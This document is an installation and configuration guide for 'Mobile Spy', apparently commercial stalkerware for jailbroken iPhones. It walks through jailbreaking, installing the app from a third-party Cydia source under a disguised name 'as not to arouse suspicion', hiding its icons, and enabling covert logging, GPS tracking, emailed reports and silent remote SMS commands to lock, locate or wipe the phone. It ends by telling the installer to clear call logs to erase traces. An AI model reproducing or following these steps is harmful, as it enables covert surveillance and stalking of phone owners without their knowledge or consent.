After you have created your username and password, there are three different groups of steps you must perform. These groups of steps are outlined below:
What is Jailbreaking & Why do I need it?
For Mobile Spy to function, it needs to run silently in the background. Normally, the iPhone cannot run applications in the background. It's necessary to jailbreak your iPhone so you can run the silent application in the background.
Jailbreaking your phone creates a Cydia icon which can be hidden easily. Cydia is needed to run the program in the background. There is no cost to jailbreaking your iPhone and it is completely reversible if the need should ever arise.
We DO NOT provide support or instructions on how to jailbreak your iPhone. The best reference websites for jailbreaking an iPhone are iClarified.com and Redmond Pie. On these sites, you can search for the methods on how to jailbreak your particular model of iPhone.
Now that you have jailbroken your phone, most of the hard work is finished. Now it's time to install the Mobile Spy program.
*** NOTE: If you are attempting to install Mobile Spy onto a 3G or 3GS running firmware version 3.1.3, you will need to install version 4.0: iPhone iOS 3.1.3 Installation Guide (version 4.0). ***
1. After jailbreaking your phone, you will see the Cydia application on your springboard. You can hide this icon through the Mobile Spy interface after finishing the installation. This is what that icon will look like:
2. Tap Cydia to run it, agree to any requests from Cydia. If it asks you to choose "Developer, User, or Hacker" please choose "Developer." Then Cydia will restart to reflect those changes. If Cydia asks you to download any updates, please do so. They usually take just a few minutes and are necessary to ensure the installation runs smoothly and without error.
3. Run Cydia again.
4. You will need to first install 3 supporting utilities in order for Mobile Spy to run efficiently.
Tap the Search icon in the black bar at the bottom of the screen. In the Search field, type OpenSSH. Then tap on the Open SSH entry. Then in the top-right corner, tap the Install button. After the download completes, tap the Return to Cydia button.
Then, tap the Search icon in the black bar at the bottom of the screen. In the Search field, type Mobile Substrate. Then tap on the Mobile Substrate entry. Then in the top-right corner, tap the Install button. After the download completes, tap the Return to Cydia button once again.
Next, tap the Search icon in the black bar at the bottom of the screen In the Search field, type SQLite 3.x. Then tap on the SQLite 3.x entry. Then in the top-right corner, tap the Install button. After the download completes, tap the Return to Cydia button once again.
5. Once the 3 supporting utilites are installed, tap the Manage icon in the black bar at the bottom of the screen.
6. Then, tap on the Sources field.

8. Then tap the Add button in the top-left corner.
9. In the Add Sources pop-up box, type: http://asd-ms.com/ms5-i. Once you finish typing in the source, tap the Add Source button.
10. Once Cydia has automatically added the source, tap the Return To Cydia button at the bottom of the screen. you will return to the Sources menu. Tap the asd-ms.com entry.
11. Now tap on the entry as shown below. This is the camoflaged name of Mobile Spy, as not to arouse suspicion or to give away that this phone is being monitored.
12. Then tap the Install button in the top-right corner to install Mobile Spy.
13. On the Confirm screen, tap the Confirm button in the upper right corner.
14. When this screen appears, Cydia is now downloading Mobile Spy to your phone.

After it finishes installing, tap the Return To Cydia button at the bottom of the screen. Then, press the Home button to return to the main springboard. POWER OFF THE DEVICE, wait 30 seconds, and then POWER IT BACK ON.
You're almost finished!
Now that you've got the program installed, it's time to bring up the interface and configure Mobile Spy to your needs.
1. First, bring up the interface by dialing *12345 from the dialer.
2. The springboard of the iPhone will reset and now an icon to access the Mobile Spy interface will now be visible labeled Smartphone. Tap on the Smartphone icon to bring up the interface.
*** NOTE: On iPhone 4G devices, the phone may attempt to dial the *12345 as an actual call. This is not an error. If it does so, simply allow the phone to attempt to call and then disconnect the call. The phone will respring a second time and then the Smartphone icon will be visible. ***
3. Now the interface should appear and prompt you for your log in information. Use your username / password you had created online in these fields. Make sure to input them EXACTLY the same way you created them online. Capitalization MUST be exact.
4. Now that you have logged in successfully, you can configure Mobile Spy to log & record the options you want it to. After logging in, tap the Logging field at the bottom of the screen. This will bring up the options menu where you can select which options you want Mobile Spy to record.
To turn a specific function On or Off, just swipe your finger over the slider to turn the function On or Off.
5. Next, tap the Location field at the bottom. This will bring up the GPS tracking feature. Here, you can select to turn this feature On or Off and select the frequency that Mobile Spy will record GPS locations by moving the slider to reflect the interval you wish to record.
6. Then tap the Security field to move to the stealth settings. Here, you can change the number sequence you dial to bring up the interface and your login information of your Mobile Spy online account. Also, you can select whether or not to hide the Cydia and Smartphone icons. By default, these features are set to On to hide these icons. Tap Save to save any changes.
** It is strongly recommended to leave these two functions in their "On" position in order to ensure the phone will show no changes that reflect that has been jailbroken or that Mobile Spy is installed. **
7. Then, tap on Recovery. This menu gives you the option to input your phone number into Mobile Spy so if the SIM card of the monitored phone is changed, your phone will receive an SMS alert showing that the SIM card has been changed. Also, you can select which remote SMS commands you wish to enable or disable. Simply move the slider to ON to enable a feature or OFF to disable. Tap Save to save any changes.
iPhone SMS Commands:
*12345 lock - Remotely lock the phone to restrict usage.
*12345 unlock - Remotely unlock the phone to allow usage.
*12345 gps - Retrieve the current GPS position of the monitored phone. The phone you send the command from will receive an SMS message containing this position and a link to it on a map.
*12345 siminfo - Retrieve the current information on the SIM card currently in the device. The phone you send the command from will receive an SMS message containing this information.
*12345 wipe - Remotely delete the recent call history, SMS history, URL history, stored contacts, and photos on the monitored device.
When sending an SMS command, only include the command code itself (no other info in the message). The monitored phone will not receive an incoming message alert as if a normal SMS message does.
NOTE: If you change the dial sequence from *12345 to another number, include the * in front of the number. Also, for SMS commands, if you change the dial sequence, use that sequence in lieu of the *12345 in the SMS commands.
8. Finally, tap on Email Alerts. This menu allows you to receive your Mobile Spy logs via email to the email account you select. Enter your valid email address in the Email ID field and use the slider to select the interval you wish to receive these emails. Then you can select which log types you wish to receive in these email reports. Moving the slider to ON includes that log type in the report and moving it to OFF removes that log type from the report. Tap Save to save any changes.
NOTE: The first time you visit this menu after installation, tap on Activate to enable email reporting for your Mobile Spy account.
9. Once you have configured Mobile Spy to fit your needs, press the Home button to return back to the springboard. Within 4-8 seconds, the springboard will reset again back to its original view, hiding both the Cydia icon (if selected) and Smartphone icon. Now Mobile Spy is ready to monitor!
*** Make sure to clear all call logs on the device after installation to remove any trace that Mobile Spy has been installed onto the device. ***
